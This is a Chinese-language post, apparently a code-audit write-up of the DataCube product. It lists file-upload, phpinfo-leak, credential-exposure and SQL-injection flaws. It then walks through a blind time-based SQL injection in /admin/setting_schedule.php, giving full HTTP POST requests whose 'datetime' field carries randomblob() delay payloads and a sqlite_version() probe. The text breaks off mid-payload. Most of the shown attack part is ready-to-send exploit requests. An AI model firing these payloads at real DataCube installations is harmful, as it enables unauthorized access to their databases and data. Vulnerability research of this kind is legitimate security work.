在这里分享一下通过拖取 DataCube 代码审计后发现的一些毛病,包括前台的文件上传,信息泄暴露账号密码,背景的文件上传。当然还有部分 SQL 注入毛病,由于 DataCube 采用的是 SQLite 的数据库,所以SQL 注入相对来说显得就很鸡肋。当然可能还有没有发现的毛病,可以互相讨论。
phpinfo 泄漏
[img=720,145.64344746162928]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536552.png[/img]
[img=720,114.61224489795919]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536553.png[/img]
SQL注入
无回显的SQL注入
[img=720,312.07517619420514]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536554.png[/img]
/DataCube/www/admin/setting_schedule.php
[img=720,278.24341279799245]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536555.png[/img]
SQLite 没有sleep()函数,但是可以用 randomblob(N) 来制造延时。randomblob(N)函数是SQLite数据库中的一个常用函数,它的作用是生成一个指定长度的随机二进制字符串。
[img=720,310.21875]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536556.png[/img]
正常请求时间- POST /admin/setting_schedule.php HTTP/1.1
- Content-Type: application/x-www-form-urlencoded
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Connection: close
-
- datetime=2024-04-24+02%3A00'+or+randomblob(9000000000000000000000000)+and+'1&tbl_type=fs&delete=1
[img=720,310.78125]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536557.png[/img]
延时相应
判定对应的 SQLite 的版本号
[code]POST /admin/setting_schedule.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closedatetime=-1'or+(case+when(substr(sqlite_version(),1,1) | 
